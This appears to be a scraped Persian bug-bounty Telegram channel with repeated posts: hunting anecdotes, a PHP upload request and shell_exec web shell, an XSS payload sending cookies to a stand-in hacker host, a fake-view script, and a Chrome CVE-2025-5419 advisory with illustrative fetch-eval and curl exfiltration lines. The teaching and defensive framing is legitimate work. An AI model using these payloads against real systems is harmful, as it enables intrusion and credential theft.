This media is not supported in your browser
VIEW IN TELEGRAM
🥷Grow up like a ninja on the life🔥
حدودا دو ماه شده که دست به سیستم نزدم که دور باشم از فضاش به دلایلی و از طرفیم غرق شده بودم توی دنیای امنیت به طوری که کل روزم میرفت روش برا همین نیازه که بیای عقب و درمورد راهی که رفتی تامل کنی ولی راه و چاه جدیدی در پیشه جمعه روز رویایی میشه!
ما داریم میایم، صبر کن تا آسیبپذیریهای جدید رو رو کنیم... به زودی همدیگه رو میبینیم!
We're on our way, so hold tight until new vulnerabilities are revealed... See you soon!
Nous sommes en route, alors accrochez-vous jusqu'à ce que de nouvelles vulnérabilités soient révélées... À bientôt !
Siamo in cammino, quindi tenetevi forte fino a quando non verranno rivelate nuove vulnerabilità... A presto!
#سرگرمی
ما داریم میایم، صبر کن تا آسیبپذیریهای جدید رو رو کنیم... به زودی همدیگه رو میبینیم!
We're on our way, so hold tight until new vulnerabilities are revealed... See you soon!
Nous sommes en route, alors accrochez-vous jusqu'à ce que de nouvelles vulnérabilités soient révélées... À bientôt !
Siamo in cammino, quindi tenetevi forte fino a quando non verranno rivelate nuove vulnerabilità... A presto!
#سرگرمی
توی ایران یکی از عجیب ترین چیزایی که دیدم این بود به یه وبسایتی زنگ زدم گفتم با تیم فنی میخوام صحبت بکنم و اینا بعد یه خانومی گرفتن و گفتن که تیم فنی هستن
من میگفتم برنامه باگ بانتی دارید؟ اینقدر کلمه براش عجیب بود که میگفت برنامه بار بندی؟ بعد من میگفتم نه باگ بانتی تست نفوذ و امنیت
اینقدر پرت بود دقت کنین تیم فنی وبسایت بوده ها ادمین فروش نبوده ادمین تیم فنی وبسایت بود
واقعا سخته توی ایران زندگی کردن و کار کردن
#تجربه
من میگفتم برنامه باگ بانتی دارید؟ اینقدر کلمه براش عجیب بود که میگفت برنامه بار بندی؟ بعد من میگفتم نه باگ بانتی تست نفوذ و امنیت
اینقدر پرت بود دقت کنین تیم فنی وبسایت بوده ها ادمین فروش نبوده ادمین تیم فنی وبسایت بود
واقعا سخته توی ایران زندگی کردن و کار کردن
#تجربه
توی حوزه باگ بانتی یه سری باگ کشف کردم که حالا نکاتی رو درموردشون بهتون میگم برای مثال خیلی از باگ هایی که زدم درمورد injection ها با پیلود های ساده خورده مثلا آخرین PHP Code Injection که زدم ز طریق پیلود زیر بود که قشنگ میزارم چی به چی شده بود
سورس کد فایل php که لود کردم این بود:
و از طرفیم نحوه ارسال فایل برای وبسرور هم اینطوری بود توی درخواست
ببینین خیلی سادس واقعا و همه میزنن ولی تارگتی که روش اینو زدن 3 تا تیم 9 نفره روش کار کردن و البته که من خودم این تارگت رو به 5 نفر هم معرفی کردم ولی ببینین چه آسیب پذیری از دستشون در رفته!
همیشه تمرکز کنین رو کارتون نتیجه میگیرن .
#تجربه
سورس کد فایل php که لود کردم این بود:
<?php
if (isset($_GET['cmd'])) {
echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
}
?>
و از طرفیم نحوه ارسال فایل برای وبسرور هم اینطوری بود توی درخواست
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Content-Type: multipart/form-data; boundary=----geckoformboundary683826c298dd095893993392f828c5e3
Content-Length: 898
Origin: https://example.com
Referer: https://example.com
------geckoformboundary683826c298dd095893993392f828c5e3
Content-Disposition: form-data; name="logo_company"; filename="888.php"
Content-Type: application/x-php
<h1>Test POC PHP Code Injection</h1>
<?php
phpinfo();
?>
------geckoformboundary683826c298dd095893993392f828c5e3
Content-Disposition: form-data; name="_token"
JifO7swkwISR0bG8RjlIcXPv3Gulhv9Hm8hWWYed
------geckoformboundary683826c298dd095893993392f828c5e3
Content-Disposition: form-data; name="_method"
PATCH
------geckoformboundary683826c298dd095893993392f828c5e3
Content-Disposition: form-data; name="name"
test
------geckoformboundary683826c298dd095893993392f828c5e3
Content-Disposition: form-data; name="username"
tes-bugbouty
------geckoformboundary683826c298dd095893993392f828c5e3
Content-Disposition: form-data; name="denoscription"
Test
------geckoformboundary683826c298dd095893993392f828c5e3--
ببینین خیلی سادس واقعا و همه میزنن ولی تارگتی که روش اینو زدن 3 تا تیم 9 نفره روش کار کردن و البته که من خودم این تارگت رو به 5 نفر هم معرفی کردم ولی ببینین چه آسیب پذیری از دستشون در رفته!
همیشه تمرکز کنین رو کارتون نتیجه میگیرن .
#تجربه
توی یه پلتفرم معروف ایرانی کار میکردم تا اون موقع باگی که تریاژ شده باشه + بانتیشم واریز شده باشه نزده بودم قبلش باگ زده بودم چندتا ولی پیچوندن و 2.5 قرار بود بدن و ندادن ، توی پلتفرم که شروع به کار کردم دیدم یه وبسایت تازه اومده بالا تارگت نیو و تازه ای بود و اپدیت داده بود روی وبسایتش
منم با شوق و ذوق که جزو اولین هانترام میرم روش رفتم هانت روش
یه باگی زدم از یه جایی که نیاز داشت سورس تمامی صفحه های سایت رو بخونی ، یکی از برنامه نویسا توی یکی از مسیر ها به نام `kids/`یه سورس جاوا اسکریپت گذاشته بود که مربوط میشد به لود کردن تصاویر که میتونست از پارامتر هم مقدار دهی بشه
رفتم تو کارش بعد 1 ساعت بوم اولین باگ خفن اونم توی پلتفرم اونم راورو در رقابت با خوبای هانت یه باگ زدم XSS زدم گفتم تا اینجا که اومدم بزار تست بگیرم ببینم میتونم حساسیت آسیب پذیری رو ببرم بالا یا که نه (اینطوری بودم که فعععععععععععکک نعععععععععععععکنم ) که با دیدگاه منفی رفتم توش و دیدم از طریق جاوا اسکریپت میتونم کوکی رو آلرت کنم
سریع یه اسکریپت یه خطی نوشتم که کوکی رو بگیره و برای سایت هکر بفرسته !
اون پیلود اینه:
بعد از اون هر وقت باگ XSS میزنم آلرت میاد بالا اول اینو میندازم ببینم درخواست میاد رو سرورم یانه شمام نگهش دارین خیلی جوابه ، البته بدونید که وقتی درخواست نمیاد یا کوکی رو نمیفرسته برین دنبال دلیلش نشه 5 ساعت وقت بزارین فکر کنین پیلود خرابه بعد ببینین نه توی کوکی ها HttpOnly اون کوکی که تو میخای true هست!
#تجربه
منم با شوق و ذوق که جزو اولین هانترام میرم روش رفتم هانت روش
یه باگی زدم از یه جایی که نیاز داشت سورس تمامی صفحه های سایت رو بخونی ، یکی از برنامه نویسا توی یکی از مسیر ها به نام `kids/`یه سورس جاوا اسکریپت گذاشته بود که مربوط میشد به لود کردن تصاویر که میتونست از پارامتر هم مقدار دهی بشه
رفتم تو کارش بعد 1 ساعت بوم اولین باگ خفن اونم توی پلتفرم اونم راورو در رقابت با خوبای هانت یه باگ زدم XSS زدم گفتم تا اینجا که اومدم بزار تست بگیرم ببینم میتونم حساسیت آسیب پذیری رو ببرم بالا یا که نه (اینطوری بودم که فعععععععععععکک نعععععععععععععکنم ) که با دیدگاه منفی رفتم توش و دیدم از طریق جاوا اسکریپت میتونم کوکی رو آلرت کنم
سریع یه اسکریپت یه خطی نوشتم که کوکی رو بگیره و برای سایت هکر بفرسته !
اون پیلود اینه:
<noscript> var xhr = new XMLHttpRequest(); xhr.open("POST", "https://HACKER-SITE.com", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send(document.cookie); </noscript>بعد از اون هر وقت باگ XSS میزنم آلرت میاد بالا اول اینو میندازم ببینم درخواست میاد رو سرورم یانه شمام نگهش دارین خیلی جوابه ، البته بدونید که وقتی درخواست نمیاد یا کوکی رو نمیفرسته برین دنبال دلیلش نشه 5 ساعت وقت بزارین فکر کنین پیلود خرابه بعد ببینین نه توی کوکی ها HttpOnly اون کوکی که تو میخای true هست!
#تجربه
توی حوزه باگ بانتی ایران
بعضی شرکت ها هستن که اولی که میری برا هماهنگی و باگ هانتینگ ازت استقبال میشه خوشحال و خوشآمدید و اینا
باگ رو گزارش میدی
سین میکنن جواب نمیده
مثل یکی از باگ هایی که html injection که از یکی از سایت های ایران با خدمات کیف پول زدم 3 ماهه سین میکنه جواب نمیده!
نمیدونم اینا چطور سرشونو رو بالش میزارن وقتی بدهکارن و مال مردم رو عین آب خوردن میخورن
باگ رو پچ کردن! ولی سین میکنه جوابتو نمیده
دراین حد وقاحت دارن بعضی وبسایت ها
در عوضش بعضی وبسایت ها هستن کوچیکن یعنی خدمات خاصی هم نمیدن ولی اینقدر خوب برخورد میکنن که میگی اصلا بزار برا اینا رایگان کار کنم فقط با اینا حرف بزنم
این کجا و آن کجا
#تجربه
بعضی شرکت ها هستن که اولی که میری برا هماهنگی و باگ هانتینگ ازت استقبال میشه خوشحال و خوشآمدید و اینا
باگ رو گزارش میدی
سین میکنن جواب نمیده
مثل یکی از باگ هایی که html injection که از یکی از سایت های ایران با خدمات کیف پول زدم 3 ماهه سین میکنه جواب نمیده!
نمیدونم اینا چطور سرشونو رو بالش میزارن وقتی بدهکارن و مال مردم رو عین آب خوردن میخورن
باگ رو پچ کردن! ولی سین میکنه جوابتو نمیده
دراین حد وقاحت دارن بعضی وبسایت ها
در عوضش بعضی وبسایت ها هستن کوچیکن یعنی خدمات خاصی هم نمیدن ولی اینقدر خوب برخورد میکنن که میگی اصلا بزار برا اینا رایگان کار کنم فقط با اینا حرف بزنم
این کجا و آن کجا
#تجربه
This media is not supported in your browser
VIEW IN TELEGRAM
Trendy stuff is usually pointless and kinda dumb. Just know your worth and make the most of it. Grow strong, like tree roots deep in the soil.🔥💪
یعنی وقتی که میرم میبینم از یه قسمت تیکت فقط 15 تا تست کیس میتونم بزنم
عشق میکنم اصلا
اون تارگت رو اون پروگرام رو روی چشمام میزارم 😂 از این تارگتا کمن تو ایران
#سرگرمی
عشق میکنم اصلا
اون تارگت رو اون پروگرام رو روی چشمام میزارم 😂 از این تارگتا کمن تو ایران
#سرگرمی
This media is not supported in your browser
VIEW IN TELEGRAM
یه PII تمیز + اکسپلویت بش
که کاربرا رو اطلاعاتشون رو لیک کنه
از این باگا بزنین لذت میده ❤️
ویدئوی آموزشی این یه آسیب پذیری مخصوصا توی ایران رو میگیرم میزارم توی کانال چون که توی دو تا سایت بزرگ ایرانی خورده این آسیب پذیری و هردو قبول کردن!
#تجربه
که کاربرا رو اطلاعاتشون رو لیک کنه
از این باگا بزنین لذت میده ❤️
ویدئوی آموزشی این یه آسیب پذیری مخصوصا توی ایران رو میگیرم میزارم توی کانال چون که توی دو تا سایت بزرگ ایرانی خورده این آسیب پذیری و هردو قبول کردن!
#تجربه
جدیدا خیلی از آسیب پذیری های خوبی که میخورن سمت باگ های لاجیک هستند، از طرفیم باگ های لاجیک به بررسی کردن نیاز داره و البته تجربه نیاز داره در نتیجه کمتر کسی میتونه بزنه
باگ بزنین، باگ لاجیک بزنین ❤️
باگ بزنین، باگ لاجیک بزنین ❤️
یه آسیب پذیری Low هست که اکثر وبسایت های ایرانی رو در بر میگیره عنوان آسیب پذیری رو برای اینکه متوجه بشید میگیم ویو فیک زدن مقالات ولی برای اینکه گزارش مون تر تمیز تر باشه میزنیم
شکستن فانکشن و یا بایپس کردن فانکشن ویو مقالات
این خیلی راحته یه کد جاوا اسکریپت رو میزاری توی کنسوله صفحه مقالات میتونی خیلی راحت تست بگیری و حتی اگر CDN هم داشت میتونید بایپس کنید یا طوری تست کنید که CDN نگیره اونو
کدشم میزارم براتون پایین تر
#تجربه
شکستن فانکشن و یا بایپس کردن فانکشن ویو مقالات
این خیلی راحته یه کد جاوا اسکریپت رو میزاری توی کنسوله صفحه مقالات میتونی خیلی راحت تست بگیری و حتی اگر CDN هم داشت میتونید بایپس کنید یا طوری تست کنید که CDN نگیره اونو
کدشم میزارم براتون پایین تر
#تجربه
Forwarded from RAVEN | ریون (𝑹𝑨𝑽𝑬𝑵)
🤍 بعد اتفاق تلخی که برای الهه حسیننژاد افتاد باید همه قابلیت sos گوشی روشن کنیم
⚪️ وقتی این قابلیت فعاله شما وقتی تو خطر باشید ۳ تا ۵ بار که دکمه پاور گوشی فشار بدید سریع لوکیشن شما رو به مخاطبینی مشخص کردین ارسال میکنه و با یکیشون هم تماس میگره
✅ فعال سازی توی آیفون
✅ اندروید
⚪️ وقتی این قابلیت فعاله شما وقتی تو خطر باشید ۳ تا ۵ بار که دکمه پاور گوشی فشار بدید سریع لوکیشن شما رو به مخاطبینی مشخص کردین ارسال میکنه و با یکیشون هم تماس میگره
✅ فعال سازی توی آیفون
وارد تنظیمات گوشیتون بشید و سرچ کنید sos گزینه emergency sos رو انتخاب کنید گزینه call with 5 button presses رو فعال کنید گزینه call quietly هم میتونید فعال کنید تا در به صورت بیصدا با مخاطبتون تماس بگیره گزینه set up emergency conats in health رو بزنید
بعد کنار Emergency contacts گزینه add رو بزنید بعد add emergency contact رو بزنید و مخاطب اضطراریتون رو اضافه کنید
✅ اندروید
تو تنظیمات سرچ کنید sos یا کمک اضطراری وارد Emergency SOS یا درخواست کمک اضطراری بشید و Countdown بزارید روی 5 توی قسمت Emergency number to call یا شماره اضطراری برای تماس شماره تلفن کسی میخواین بهش زنگ بخوره مشخص کنید حالا Send SOS to emergency contacts یا ارسال SOS به مخاطبین اضطراری رو بزنید و مخاطبین که قراره بهشون اسمس و لوکیشن ارسال بشه رو وارد کنید
Life and Learning🎭
یه آسیب پذیری Low هست که اکثر وبسایت های ایرانی رو در بر میگیره عنوان آسیب پذیری رو برای اینکه متوجه بشید میگیم ویو فیک زدن مقالات ولی برای اینکه گزارش مون تر تمیز تر باشه میزنیم شکستن فانکشن و یا بایپس کردن فانکشن ویو مقالات این خیلی راحته یه کد جاوا اسکریپت…
// اسکریپت تست بازدید مقاله (فقط برای مقاصد آموزشی یا تست)
const simulateViews = async (url = 'TARGET-PATH', times = 10, delay = 1000) => {
for (let i = 0; i < times; i++) {
try {
await fetch(url, { method: 'POST' });
console.log(`View ${i + 1} sent`);
} catch (err) {
console.error(`Error on view ${i + 1}:`, err);
}
await new Promise(r => setTimeout(r, delay)); // تاخیر برای جلوگیری از بن شدن
}
};
// استفاده:
simulateViews('TARGET-PATH', 20, 2000); // ۲۰ بازدید با فاصله ۲ ثانیه
این کد آسیب پذیری Fake View
که توی کنسول صفحه ای که میخاید روش تست کنید باید بزنید
نکته : توی کنسول همون صفحه بزنید
#تجربه
Have three goals:
1. Wealth and honor
2. Power and gratitude
3. Family and kindness
یه کانالی هست که در نگاه اول یه سری اطلاعات نسبتا قدیمی ولی بیسیکی رو گذاشته ولی توی تارگت های ایرانی ممکنه خیلی جواب بدن اگر توی تایم ازادتون میخواستن علکی ریلز اینستاگرام نگاه کنید میتونید این کانال رو نگاه کنید تا توی حرفه خودتون اپدیت بشید!
https://news.1rj.ru/str/GitBook_s
ولی در کل همیشه سعی کنید رو به جلو باشید هیچ وقت رو به عقب نباشید و یه جا استپ نکنید که این بدترین کار توی جوانیه!
باگ بزنید!
#سرگرمی
https://news.1rj.ru/str/GitBook_s
ولی در کل همیشه سعی کنید رو به جلو باشید هیچ وقت رو به عقب نباشید و یه جا استپ نکنید که این بدترین کار توی جوانیه!
باگ بزنید!
#سرگرمی
Telegram
Bug Bounty - GitBook
GitBooks, Notion, medium, Mindmaps, books
bug bounty, pentest, ctf, osint, labs, tools
writeUps, check list, Cheatsheet, tips, GitHub
bug bounty, pentest, ctf, osint, labs, tools
writeUps, check list, Cheatsheet, tips, GitHub
This media is not supported in your browser
VIEW IN TELEGRAM
شما باید برای دیدن همچین لحظاتی : بی خوابی بکشید ، درد بکشید ، سختی بکشید ، سرو کله زدن و مذاکره کردن یاد بگیرید ، بی حوصلگی بکشید ، روزی 12 ساعت کار بکشید ، روزی 6 ساعت خواب بکشید ، و ....
ولی در نهایت چیزی که تمام اینها رو از یادتون میبره این لحضاتیه که چنین انرژی به ادم میده جایی که همه هم سن ها دنبال چیزای متفرقه هستن تو با توکل و تلاش و تفکر تونستی یه قدم جلو تر باشی این کلمه که بابا از کحا اوردی این پولارو خستگی رو از تن آدم به در میبره بهتون قول میدم که همینطور باشه.
و در آخر باگ بزنید!
#انگیزه
ولی در نهایت چیزی که تمام اینها رو از یادتون میبره این لحضاتیه که چنین انرژی به ادم میده جایی که همه هم سن ها دنبال چیزای متفرقه هستن تو با توکل و تلاش و تفکر تونستی یه قدم جلو تر باشی این کلمه که بابا از کحا اوردی این پولارو خستگی رو از تن آدم به در میبره بهتون قول میدم که همینطور باشه.
و در آخر باگ بزنید!
#انگیزه
🚨 کشف 0Day در گوگل کروم!
📢 یه زیرودی با کد CVE-2025-5419 (امتیاز CVSS: 8.8) تو مرورگر گوگل کروم پیدا شده.
🕵️♂️ ماجرا چیه؟
این آسیبپذیری یه مشکل خواندن و نوشتن خارج از محدوده تو موتور جاوا اسکریپت V8 و WebAssembly کرومه که توسط کلمنت لسین و بنوا سون از تیم تحلیل تهدید گوگل (TAG) کشف شده.
🔍 چرا خطرناکه؟
شناسه باگ: CVE-2025-5419
امتیاز CVSS: 8.8 (بسیار خطرناک!)
مشکل اصلی: هکر میتونه با یه صفحه HTML مخرب، از خرابی پشته سوءاستفاده کنه و کد دلخواهش رو روی سیستم شما اجرا کنه.
تاثیر: دسترسی غیرمجاز، سرقت اطلاعات حساس، یا حتی نصب بدافزار (مثل باجافزار یا جاسوسافزار).
ویژگیهای خطرناک:
حمله از راه دور: فقط با باز کردن یه صفحه وب مخرب، سیستم شما در خطره!
بدون نیاز به تعامل زیاد: یه کلیک ساده میتونه کافی باشه.
استفاده گسترده: کروم تو لپتاپها، گوشیها و حتی سرورهای سازمانی پراستفادهست، پس هدف جذابی برای هکرهاست.
🔥 سناریو: هک سیستم شما از طریق یه لینک مخرب!
قدم ۱: پیدا کردن قربانی
هکر یه وبسایت جعلی یا تبلیغ مخرب میسازه و لینک اونو از طریق ایمیل، پیام تلگرام یا شبکههای اجتماعی پخش میکنه. مثلاً:
قدم ۲: سوءاستفاده از CVE-2025-5419
وقتی شما روی لینک کلیک میکنید، صفحه HTML مخرب یه payload جاوا اسکریپت اجرا میکنه که از نقص V8 سوءاستفاده میکنه. نمونه کد مخرب:
این کد باعث خرابی پشته میشه و به هکر اجازه میده کد دلخواهش رو اجرا کنه.
قدم ۳: دسترسی به سیستم
هکر یه وبشل یا بدافزار روی سیستم شما آپلود میکنه:
حالا هکر میتونه فایلهای شما رو بدزده، وبکم رو روشن کنه یا حتی سیستم رو قفل کنه!
قدم ۴: سرقت اطلاعات و خرابکاری
هکر اطلاعات حساس (مثل رمزها یا فایلهای شخصی) رو میدزده:
یا بدافزار نصب میکنه و ردشو پاک میکنه تا کسی نفهمه!
🛡 چطور از خودمون محافظت کنیم؟
برای اینکه قربانی این زیرودی نشید:
فوراً آپدیت کنید: کروم رو به نسخه 137.0.7151.68/.69 (ویندوز و مک) یا 137.0.7151.68 (لینوکس) آپدیت کنید.
تو کروم برید به:
Settings > About Chrome
و آپدیت رو چک کنید.
بهروزرسانی خودکار رو روشن کنید: اینجوری همیشه آخرین وصلههای امنیتی رو دارید.
لینکهای مشکوک رو باز نکنید: ایمیلها یا پیامهای ناشناس رو چک کنید.
آنتیویروس بهروز داشته باشید: میتونه بدافزارهای احتمالی رو شناسایی کنه.
فایروال فعال کنید: جلوی اتصالات مشکوک رو میگیره.
🌐 منبع:
https://thehackernews.com/2025/06/new-chrome-zero-day-actively-exploited.html
📢 یه زیرودی با کد CVE-2025-5419 (امتیاز CVSS: 8.8) تو مرورگر گوگل کروم پیدا شده.
🕵️♂️ ماجرا چیه؟
این آسیبپذیری یه مشکل خواندن و نوشتن خارج از محدوده تو موتور جاوا اسکریپت V8 و WebAssembly کرومه که توسط کلمنت لسین و بنوا سون از تیم تحلیل تهدید گوگل (TAG) کشف شده.
🔍 چرا خطرناکه؟
شناسه باگ: CVE-2025-5419
امتیاز CVSS: 8.8 (بسیار خطرناک!)
مشکل اصلی: هکر میتونه با یه صفحه HTML مخرب، از خرابی پشته سوءاستفاده کنه و کد دلخواهش رو روی سیستم شما اجرا کنه.
تاثیر: دسترسی غیرمجاز، سرقت اطلاعات حساس، یا حتی نصب بدافزار (مثل باجافزار یا جاسوسافزار).
ویژگیهای خطرناک:
حمله از راه دور: فقط با باز کردن یه صفحه وب مخرب، سیستم شما در خطره!
بدون نیاز به تعامل زیاد: یه کلیک ساده میتونه کافی باشه.
استفاده گسترده: کروم تو لپتاپها، گوشیها و حتی سرورهای سازمانی پراستفادهست، پس هدف جذابی برای هکرهاست.
🔥 سناریو: هک سیستم شما از طریق یه لینک مخرب!
قدم ۱: پیدا کردن قربانی
هکر یه وبسایت جعلی یا تبلیغ مخرب میسازه و لینک اونو از طریق ایمیل، پیام تلگرام یا شبکههای اجتماعی پخش میکنه. مثلاً:
http://malicious-site.ir/promo.html
قدم ۲: سوءاستفاده از CVE-2025-5419
وقتی شما روی لینک کلیک میکنید، صفحه HTML مخرب یه payload جاوا اسکریپت اجرا میکنه که از نقص V8 سوءاستفاده میکنه. نمونه کد مخرب:
const wasmCode = new Uint8Array([0x00, 0x61, 0x73, 0x6D, ...]);
const wasmModule = new WebAssembly.Module(wasmCode);
const wasmInstance = new WebAssembly.Instance(wasmModule);
wasmInstance.exports.exploit();
این کد باعث خرابی پشته میشه و به هکر اجازه میده کد دلخواهش رو اجرا کنه.
قدم ۳: دسترسی به سیستم
هکر یه وبشل یا بدافزار روی سیستم شما آپلود میکنه:
fetch('http://malicious.ir/shell.js')
.then(response => response.text())
.then(noscript => eval(noscript));حالا هکر میتونه فایلهای شما رو بدزده، وبکم رو روشن کنه یا حتی سیستم رو قفل کنه!
قدم ۴: سرقت اطلاعات و خرابکاری
هکر اطلاعات حساس (مثل رمزها یا فایلهای شخصی) رو میدزده:
curl -X POST http://malicious.ir/steal -d "$(cat ~/.passwords)"
یا بدافزار نصب میکنه و ردشو پاک میکنه تا کسی نفهمه!
🛡 چطور از خودمون محافظت کنیم؟
برای اینکه قربانی این زیرودی نشید:
فوراً آپدیت کنید: کروم رو به نسخه 137.0.7151.68/.69 (ویندوز و مک) یا 137.0.7151.68 (لینوکس) آپدیت کنید.
تو کروم برید به:
Settings > About Chrome
و آپدیت رو چک کنید.
بهروزرسانی خودکار رو روشن کنید: اینجوری همیشه آخرین وصلههای امنیتی رو دارید.
لینکهای مشکوک رو باز نکنید: ایمیلها یا پیامهای ناشناس رو چک کنید.
آنتیویروس بهروز داشته باشید: میتونه بدافزارهای احتمالی رو شناسایی کنه.
فایروال فعال کنید: جلوی اتصالات مشکوک رو میگیره.
🌐 منبع:
https://thehackernews.com/2025/06/new-chrome-zero-day-actively-exploited.html